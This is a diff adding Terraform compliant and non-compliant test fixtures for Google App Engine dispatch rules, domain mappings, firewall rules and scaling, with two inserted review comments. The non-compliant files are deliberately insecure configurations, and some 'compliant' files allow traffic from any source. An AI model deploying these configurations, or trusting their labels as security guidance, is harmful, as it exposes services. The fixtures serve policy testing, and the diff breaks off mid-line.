+++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/c.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/c.tf new file mode 100644 index 000000000..c5d800c77 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/c.tf @@ -0,0 +1,14 @@ +resource "google_app_engine_application_url_dispatch_rules" "c" { + project = "gcp-project12345" + dispatch_rules { + domain = "*" + path = "/*" + service = "default" + } + + dispatch_rules { + domain = "*" + path = "/admin/*" + service = "admin" + } +} \ No newline at end of file 
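Review bot: the only defect in dispatch_rules_path/nc.tf is the missing leading slash in `path = "admin/*"`, which the API may reject as malformed before any policy runs, so this fixture tests input validation rather than a security property. A more useful non-compliant case is a well-formed rule that routes `/admin/*` to `default`, or a `/*` catch-all placed ahead of the admin rule; both are accepted by the API and both expose the admin paths on the public service.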
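Review bot: dispatch_rules_service/c.tf uses `project = "gcp-project12345"` (no hyphen) while every other fixture uses `gcp-project-12345`; this looks like a typo, and if the project rule is run across all inputs it would make the compliant fixture fail for an unrelated reason. The file also lists the `/*` catch-all before `/admin/*`; dispatch rules are matched first-match-wins, so the `admin` rule in this fixture never matches either.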
diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/config.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/nc.tf b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/nc.tf new file mode 100644 index 000000000..dd2d94f91 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/nc.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_application_url_dispatch_rules" "nc" { + project = "gcp-project-12345" + dispatch_rules { + domain = "*" + path = "/*" + service = "unauthorized-service" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/plan.json b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/plan.json new file mode 100644 index 000000000..bb2d7f531 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_application_url_dispatch_rules/dispatch_rules/dispatch_rules_service/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null 
+++ b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/c.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/c.tf new file mode 100644 index 000000000..eef53664a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/c.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_domain_mapping" "c" { + project = "gcp-project-12345" + domain_name = "hardhatenterprises.com" + + ssl_settings { + ssl_management_type = "AUTOMATIC" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/config.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null 
+++ b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/nc.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/nc.tf new file mode 100644 index 000000000..313b1447b --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/nc.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_domain_mapping" "nc" { + project = "gcp-project-12345" + domain_name = "random-unverified-site.com" + + ssl_settings { + ssl_management_type = "AUTOMATIC" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/plan.json b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/plan.json new file mode 100644 index 000000000..90bc8ed8b Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_domain_mapping/domain_name/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/c.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/c.tf new file mode 100644 index 000000000..8a772ae0d --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/c.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_domain_mapping" "c" { + project = "gcp-project-12345" + domain_name = "verified-domain.com" + override_strategy = "STRICT" + + ssl_settings { + ssl_management_type = "AUTOMATIC" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/config.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null 
+++ b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/nc.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/nc.tf new file mode 100644 index 000000000..82545b8ba --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/nc.tf @@ -0,0 +1,9 @@ +resource "google_app_engine_domain_mapping" "nc" { + project = "gcp-project-12345" + domain_name = "unverified-domain.com" + override_strategy = "OVERRIDE" + + ssl_settings { + ssl_management_type = "AUTOMATIC" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/plan.json b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/plan.json new file mode 100644 index 000000000..fb1ef2b4d Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_domain_mapping/override_strategy/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/c.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/c.tf new file mode 100644 index 000000000..a8ecef3b2 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/c.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_domain_mapping" "c" { + project = "gcp-project-12345" + domain_name = "verified-domain.com" + + ssl_settings { + ssl_management_type = "AUTOMATIC" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/config.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null 
+++ b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/nc.tf b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/nc.tf new file mode 100644 index 000000000..53e739ce9 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/nc.tf @@ -0,0 +1,8 @@ +resource "google_app_engine_domain_mapping" "nc" { + project = "gcp-project-12345" + domain_name = "unverified-domain.com" + + ssl_settings { + ssl_management_type = "MANUAL" + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/plan.json b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/plan.json new file mode 100644 index 000000000..e2f753822 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_domain_mapping/ssl_settings/ssl_management_type/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/action/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_firewall_rule/action/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/action/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/action/c.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/action/c.tf new file mode 100644 index 000000000..d14450a1d --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/action/c.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_firewall_rule" "c" { + project = "gcp-project-12345" + priority = 1000 + action = "ALLOW" + source_range = "0.0.0.0/0" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/action/config.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/action/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/action/config.tf 
@@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/action/nc.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/action/nc.tf new file mode 100644 index 000000000..875639f5b --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/action/nc.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_firewall_rule" "nc" { + project = "gcp-project-12345" + priority = 1000 + action = "DENY" + source_range = "0.0.0.0/0" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/action/plan.json b/inputs/gcp/app_engine/app_engine_firewall_rule/action/plan.json new file mode 100644 index 000000000..ecb12c08f Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_firewall_rule/action/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/priority/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/priority/c.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/c.tf new file mode 100644 index 000000000..52e3e2925 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/c.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_firewall_rule" "c" { + project = "gcp-project-12345" + priority = 1000 + action = "ALLOW" + source_range = "*" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/priority/config.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/config.tf 
@@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/priority/nc.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/nc.tf new file mode 100644 index 000000000..ce381326a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/nc.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_firewall_rule" "nc" { + project = "gcp-project-12345" + priority = 2147483647 + action = "ALLOW" + source_range = "*" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/priority/plan.json b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/plan.json new file mode 100644 index 000000000..d45a33ac5 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_firewall_rule/priority/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/c.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/c.tf new file mode 100644 index 000000000..c9bded9ec --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/c.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_firewall_rule" "c" { + project = "ae-project" + priority = 1001 + action = "ALLOW" + source_range = "192.168.1.0/24" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/config.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/config.tf 
@@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/nc.tf b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/nc.tf new file mode 100644 index 000000000..dcdc319aa --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/nc.tf @@ -0,0 +1,6 @@ +resource "google_app_engine_firewall_rule" "nc" { + project = "ae-project" + priority = 1000 + action = "ALLOW" + source_range = "*" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/plan.json b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/plan.json new file mode 100644 index 000000000..153eb74cd Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_firewall_rule/source_range/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/c.tf new file mode 100644 index 000000000..19fee63c6 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/c.tf 
@@ -0,0 +1,37 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "appeng-flex" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + resources { + cpu = 1 + memory_gb = 4 + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/nc.tf new file mode 100644 index 000000000..fa1f8b1a2 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/nc.tf 
@@ -0,0 +1,37 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "appeng-flex" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.9 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + resources { + cpu = 1 + memory_gb = 4 + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/plan.json new file mode 100644 index 000000000..99b9428f3 Binary files /dev/null and 